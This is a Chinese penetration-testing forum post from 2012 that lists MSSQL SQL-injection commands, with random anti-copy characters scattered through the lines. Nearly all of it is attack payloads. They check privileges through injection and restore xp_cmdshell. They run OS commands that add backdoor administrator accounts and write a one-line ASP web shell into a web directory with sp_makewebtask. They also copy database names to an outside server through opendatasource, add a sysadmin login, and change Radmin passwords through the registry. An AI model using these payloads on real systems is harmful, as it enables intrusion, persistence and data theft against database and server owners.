找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 常用的一些注入命令
返回列表 发新帖
查看: 2839|回复: 0
打印 上一主题 下一主题

常用的一些注入命令

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 14:40:13 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
//看看是什么权限的8 S0 l, d- A) v+ }
and 1=(Select IS_MEMBER('db_owner'))
9 G* {, y( d- GAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--3 I- ]  d2 M/ B# k1 ?
3 ]* U! `! y* r) ]/ p+ J/ t" D3 f
//检测是否有读取某数据库的权限3 u8 a5 j0 ~) \# ~- r! H3 {0 t
and 1= (Select HAS_DBACCESS('master'))( N3 S6 v1 e; |. Q
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
+ x7 t; P5 V6 T! C: s6 _; t" b; o! |  }

' C, d; M) L; y; X数字类型
  l; z, ^- K0 h& h. P. m. E* E* o2 c3 Aand char(124)%2Buser%2Bchar(124)=0, o! s: B/ a* O$ D5 K

# H) R( `9 \5 I% ]! ?3 r1 u, c9 E+ |! {字符类型
3 J* r% A. [% d0 ?& |' and char(124)%2Buser%2Bchar(124)=0 and ''='( E) m" U. W+ N3 c! E

- s5 b' O$ v8 Z1 o+ h搜索类型
3 m3 R9 l# j' l- C' and char(124)%2Buser%2Bchar(124)=0 and '%'='
) y0 q" v* |- @4 ~8 B) k. B' ?" T" B! _5 w% y+ g/ p% J
爆用户名
/ ?8 T% n# G4 Y2 s( u! \$ ?0 Vand user>0# D8 B: s' S2 D# E6 ]
' and user>0 and ''='& }5 e  q7 B& B+ `

3 F0 t! A5 e# T, R- f* N$ N  L检测是否为SA权限
' m5 r7 V0 L. _' C! Iand 1=(select IS_SRVROLEMEMBER('sysadmin'));--7 R  |& l' S; Q- Q9 d7 S! u
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --- t  B2 }+ W* G, c* ^

  y5 d) `/ f' w& C/ K8 W检测是不是MSSQL数据库! i3 O9 q" k$ R" p: m3 J
and exists (select * from sysobjects);--# N# _6 K) |) J

" P  E4 Q. L/ F' Z# m9 A检测是否支持多行
% W# G/ G% E- M8 a, ~6 K% b/ m;declare @d int;--
  G  \6 q- \( V! F+ \% A2 E/ X& P! N, T* a: H( r* |8 i6 z2 n# }
恢复 xp_cmdshell% g, G$ g8 D' }: E
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
$ q* W; f: G4 `% b: ?2 \, c0 G, \1 Q, I' r# Y/ C& T
4 ^& s4 d" Q+ b0 [% L" R
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version'); ^! m6 |0 W! j! p
1 i, n- R9 h6 ^) @, r
//-----------------------
4 s8 W5 v* R. a4 U! H8 q9 Y//       执行命令
" S: o% N% X; I# R8 y5 H1 ]: N' }# u//-----------------------
/ t, ]! {4 u' f0 m0 u9 I3 f) F首先开启沙盘模式:6 B$ L& Q' X9 D" u
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
; U) q) K& ^8 [2 d' ^
$ ^7 b" p% z. v2 {然后利用jet.oledb执行系统命令
9 [. e2 a& q0 b  D& \select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
2 T& W) w0 j% E( `; Z3 Y, B
! O# Y8 D/ [3 X6 k: d9 z* y1 \执行命令8 ^% `% p( F! r3 `2 K% T: u4 H' G
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--8 ^/ ^& X) i" y1 Q$ @+ i

2 D4 ]& C3 e/ l3 K& uEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'/ J. g( @0 q* f. S

, ]- E% T$ F) Y, I% Y! r- u判断xp_cmdshell扩展存储过程是否存在:& k- [1 n" E* B1 y' F% W
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
+ }% y2 H' n1 D7 O* Q$ A
  ~, @1 d4 a7 D. ]8 ^写注册表  e% w/ l4 C; m0 a8 o
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1' g1 d- w  K" m# Y4 ?7 ]) U
$ a, H1 @+ K2 c
REG_SZ: X7 {4 J: f6 a, \" h+ ]. `* y2 p

, d4 E7 m9 p5 n& \读注册表, n; T7 P( z+ _, C- c8 x
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
" [# V5 k, h6 ~, J; H
& N2 o, Z8 a: w0 \" c$ G! u读取目录内容3 t- @$ ]4 ]3 c1 i- ^' M
exec master..xp_dirtree 'c:\winnt\system32\',1,1+ j8 p0 G+ h& b5 d
# Q) ~7 Q+ h6 _/ k0 |# j

6 f% W  U7 l/ P8 O4 G数据库备份
  n: G0 B; V; w0 V1 D5 ubackup database pubs to disk = 'c:\123.bak': G2 u2 L' F) u& A

' v6 s3 [3 ^: ?  v8 {$ y7 d* U//爆出长度. b3 w0 Q. A0 D! ?7 O" i
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--( L& G4 A+ V& h  M' y
: I! Q/ h* H6 N$ v

/ \9 P/ }3 p! m$ V- m) q
" N/ ~! z, M/ Y更改sa口令方法:用sql综合利用工具连接后,执行命令:
! l! [" N& c+ R8 O( ~exec sp_password NULL,'新密码','sa'/ P% f$ W) E0 s2 ~; g: J  }3 Y

! I& R5 G0 v2 A& x) @添加和删除一个SA权限的用户test:* Y# v4 t5 ]8 D) P
exec master.dbo.sp_addlogin test,95307721 A. L" B2 B. }! a
exec master.dbo.sp_addsrvrolemember test,sysadmin$ ^4 h7 p9 N* ?6 K; A( A5 n

/ S' H& A9 u6 I9 t; L删除扩展存储过过程xp_cmdshell的语句:
, M6 m& q/ ~1 H5 Mexec sp_dropextendedproc 'xp_cmdshell'
/ R. s& i6 t) N& G3 _0 P9 f6 X( S) d( }9 r( @7 v. Z
添加扩展存储过过程- ^& u8 i! y: ?3 y0 f% ?% x
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
5 c; m) ~) j3 `4 \; }% C5 g, rGRANT exec On xp_proxiedadata TO public; m( ~+ j5 A% X' D6 b. x$ o
! c* M, A  t- W! E- h  |7 @

  A% J/ [& N8 U3 c  w停掉或激活某个服务。% ^: Y1 N# g9 \0 ^$ \
1 x. X( p, u* y; S
exec master..xp_servicecontrol 'stop','schedule'
6 B7 w" T' u0 ~- }6 n8 V5 lexec master..xp_servicecontrol 'start','schedule'' C1 Y. Z2 }; n* x/ j& T) y
7 Z7 }# c* ^. z6 }& x& t! {4 y! J
dbo.xp_subdirs
: a$ r) D% t% C5 Z! j) j6 s3 V3 s. X
只列某个目录下的子目录。
- E! @9 m2 [1 Uxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
7 f; e1 J7 Z) O# s: I1 g
: ]9 F+ q& x" v- W8 X+ |4 ?dbo.xp_makecab
3 n9 y8 O, C6 g4 ]$ {5 h5 u) U0 \  q% m* O$ J
将目标多个档案压缩到某个目标档案之内。
1 P/ x& x8 M9 N* b) R- z所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
, B" m: W2 t4 F& @: m" R6 o9 \8 l  u( Q
dbo.xp_makecab) k5 y( r- a$ x, f6 B
'c:\test.cab','mszip',1,5 P/ Y4 [5 n* f# D9 f
'C:\Inetpub\wwwroot\SQLInject\login.asp',
$ s% `) t0 t* I'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
6 ]6 N" W) x( H% B+ B, Z! r# |# l  P# b# v, [3 _  h
xp_terminate_process
! n/ u# F8 ]3 ?; u  x8 l6 C7 R* N. Z3 y6 F
停掉某个执行中的程序,但赋予的参数是 Process ID。
0 H- K) q; m2 U) j6 _+ E2 X利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID1 C5 h; ]4 I/ v9 U& x! m

# V) q% B: }3 ], l$ ?xp_terminate_process 2484
  Z5 h: }1 ?* V: B" k  j. |
8 |; c  F5 Q2 _6 Q  ^/ ^xp_unpackcab) s6 d8 z6 B7 }0 h

4 ?" ~# C* H, b解开压缩档。, C2 R3 v5 v% L9 H* q1 H$ V

0 P. @" g+ M: E& R% ?1 X- Fxp_unpackcab 'c:\test.cab','c:\temp',1
% l! W. j# `! @* P! P/ l9 r  u+ d' ^7 d) Z: R6 }
& x! F* u9 F/ d" u
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为12342 y# R  g+ m' M' y& y
8 B* m3 O7 ^7 N  t+ a
create database lcx;1 ^* f" j' X& J0 k6 J+ @" I$ o
Create TABLE ku(name nvarchar(256) null);
+ \+ e' O2 A# h  zCreate TABLE biao(id int NULL,name nvarchar(256) null);
9 ?' j) c  y5 f3 c& @
7 h% T3 Q/ z9 e) p  w//得到数据库名
' l" A! L: v3 _* Rinsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
& _% `$ S4 h, s1 e0 B2 W6 X
+ u; ^1 y8 [& N4 V' Q$ h9 h6 f. H# m( d' L
//在Master中创建表,看看权限怎样
4 p2 q  B" [6 e4 N/ L6 TCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
; ?1 M" D- I3 e2 T! Y3 B3 t" G4 O9 m) e8 z) ^" F2 A) ?
用 sp_makewebtask直接在web目录里写入一句话马:+ m( p& U1 h, M; G5 S. C
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--5 N' v0 `9 y. H3 s7 z- T$ U; K7 h

$ O+ C& L" a6 {  S6 ]; C+ D//更新表内容# e; S$ y% `5 ^2 t4 n% y% Z' U
Update films SET kind = 'Dramatic' Where id = 123
& T/ y+ s; a% i% ^/ |  W  x0 w
//删除内容4 C% I5 G2 J& ]- Q: U
delete from table_name where Stockid = 3
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表